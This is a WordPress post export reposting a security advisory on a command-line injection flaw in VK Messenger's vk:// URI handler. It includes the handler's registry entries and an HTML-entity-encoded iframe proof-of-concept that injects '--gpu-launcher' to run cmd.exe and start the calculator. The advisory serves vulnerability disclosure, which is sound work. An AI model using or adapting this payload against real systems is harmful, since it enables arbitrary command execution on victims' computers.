{"id":11741,"date":"2018-03-14T14:20:43","date_gmt":"2018-03-14T22:20:43","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2018\/03\/14\/news-5511\/"},"modified":"2018-03-14T14:20:43","modified_gmt":"2018-03-14T22:20:43","slug":"news-5511","status":"publish","type":"post","link":"https:\/\/www.palada.net\/index.php\/2018\/03\/14\/news-5511\/","title":{"rendered":"SSD Advisory &#8211; VK Messenger (VKontakte) vk:\/\/ URI Handler Commands Execution"},"content":{"rendered":"<p><strong>Credit to Author: SSD \/ Noam Rathaus| Date: Sun, 11 Mar 2018 10:51:34 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<p><strong>Want to get paid for a vulnerability similar to this one?<\/strong><br \/>Contact us at: <a href=\"mailto:sxsxd@bxexyxoxnxdxsxexcxuxrxixtxy.com\" onmouseover=\"this.href=this.href.replace(\/x\/g,'');\" id=\"a-href-3674\">sxsxdx@xbxexyxoxnxdxsxexcxuxrxixtxy.xcom<\/a><br \/><script>var obj = jQuery('#a-href-3674');if(obj[0]) { obj[0].innerText = obj[0].innerText.replace(\/x\/g, ''); }<\/script> See our full scope at: <a href=\"https:\/\/blogs.securiteam.com\/index.php\/product_scope\">https:\/\/blogs.securiteam.com\/index.php\/product_scope<\/a><\/p>\n<div class=\"pf-content\">\n<p><strong>Vulnerability Summary<\/strong><br \/> The following describes a vulnerability in VK Messenger that is triggered via the exploitation of improperly handled URI.<\/p>\n<p>VK (VKontakte; [..], meaning InContact) is &#8220;an online social media and social networking service. It is available in several languages. VK allows users to message each other publicly or privately, to create groups, public pages and events, share and tag images, audio and video, and to play browser-based games. It is based in Saint Petersburg, Russia&#8221;.<\/p>\n<p><strong>Credit<\/strong><br \/> An independent security researcher has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program.<\/p>\n<p><strong>Affected Version<\/strong><br \/> VK Messenger version 3.1.0.143<\/p>\n<p><strong>Vendor Response<\/strong><br \/> The vendor responded that the problem no longer affects the latest version &#8211; but didn&#8217;t provide any information on when it was fixed and whether it was fixed due to someone else reporting this vulnerability.<br \/> <span id=\"more-3674\"><\/span><br \/> The VK Messenger, which is part of the VK package, registers a uri handler on Windows in the following way:<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5aa9a03aa34fa079791470\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> [HKEY_CLASSES_ROOTvk]  &#8220;URL Protocol&#8221;=&#8221;&#8221;  @=&#8221;URL:vk&#8221;    [HKEY_CLASSES_ROOTvkshell]    [HKEY_CLASSES_ROOTvkshellopen]    [HKEY_CLASSES_ROOTvkshellopencommand]  @=&#8221;&#8221;C:\\Program Files\\VK\\vk.exe&#8221; &#8220;%1&#8243;&#8221;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">  \t\t\t\t  \t\t\t<\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0008 seconds] -->  <\/p>\n<p><strong>Vulnerability<\/strong><br \/> When the browser processes the &#8216;vk:\/\/&#8217; uri handler it is possible to inject arbitrary command line parameters for vk.exe, since the application does not properly parse them. It is possible to inject the &#8216;&#8211;gpu-launcher=&#8217; parameter to execute arbitrary commands. It is also possible to inject the &#8216;&#8211;browser-subprocess-path=&#8217; parameter to execute arbitrary commands. Network share paths are allowed, too.<\/p>\n<p>Example of attack encoded in HTML entity:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5aa9a03aa3506609012997\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> &lt;iframe src=&#8217;vk:?&#8221;&amp;#32;&amp;#45;&amp;#45;&amp;#103;&amp;#112;&amp;#117;&amp;#45;&amp;#108;&amp;#97;&amp;#117;&amp;#110;&amp;#99;&amp;#104;&amp;#101;&amp;#114;&amp;#61;&amp;#34;&amp;#99;&amp;#109;&amp;#100;&amp;#46;&amp;#101;&amp;#120;&amp;#101;&amp;#32;&amp;#47;&amp;#99;&amp;#32;&amp;#115;&amp;#116;&amp;#97;&amp;#114;&amp;#116;&amp;#32;&amp;#99;&amp;#97;&amp;#108;&amp;#99;&amp;#34;&amp;#32;&amp;#45;&amp;#45;&#8217;&gt;&lt;\/iframe&gt;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a03aa3506609012997-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5aa9a03aa3506609012997-1\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">iframe <\/span><span class=\"crayon-v\">src<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8216;vk:?&#8221;&amp;#32;&amp;#45;&amp;#45;&amp;#103;&amp;#112;&amp;#117;&amp;#45;&amp;#108;&amp;#97;&amp;#117;&amp;#110;&amp;#99;&amp;#104;&amp;#101;&amp;#114;&amp;#61;&amp;#34;&amp;#99;&amp;#109;&amp;#100;&amp;#46;&amp;#101;&amp;#120;&amp;#101;&amp;#32;&amp;#47;&amp;#99;&amp;#32;&amp;#115;&amp;#116;&amp;#97;&amp;#114;&amp;#116;&amp;#32;&amp;#99;&amp;#97;&amp;#108;&amp;#99;&amp;#34;&amp;#32;&amp;#45;&amp;#45;&#8217;<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">iframe<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0003 seconds] -->  <\/p>\n<p>When opening a malicious page, a notification box asks the user to open VK.<\/p>\n<p>NOTE: The application is not in the auto-startup items, and the issue will work if the application is not already started. <\/p>\n<p>As attachment, proof of concept code. <\/p>\n<div class=\"printfriendly pf-alignleft\"><a href=\"#\" rel=\"nofollow\" onclick=\"window.print(); return false;\" class=\"noslimstat\" title=\"Printer Friendly, PDF &#038; Email\"><img decoding=\"async\" style=\"border:none;-webkit-box-shadow:none; box-shadow:none;\" src=\"https:\/\/cdn.printfriendly.com\/buttons\/printfriendly-button.png\" alt=\"Print Friendly, PDF &#038; Email\" \/><\/a><\/div>\n<\/div><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3674\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/cdn.printfriendly.com\/buttons\/printfriendly-button.png\"\/><\/p>\n<p><strong>Credit to Author: SSD \/ Noam Rathaus| Date: Sun, 11 Mar 2018 10:51:34 +0000<\/strong><\/p>\n<p>Vulnerability Summary The following describes a vulnerability in VK Messenger that is triggered via the exploitation of improperly handled URI. VK (VKontakte; [..], meaning InContact) is &#8220;an online social media and social networking service. It is available in several languages. VK allows users to message each other publicly or privately, to create groups, public pages &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3674\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory &#8211; VK Messenger (VKontakte) vk:\/\/ URI Handler Commands Execution<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[11851,10757,17763],"class_list":["post-11741","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-remote-command-execution","tag-securiteam-secure-disclosure","tag-unauth"],"_links":{"self":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/11741","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=11741"}],"version-history":[{"count":0,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/11741\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=11741"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=11741"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=11741"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}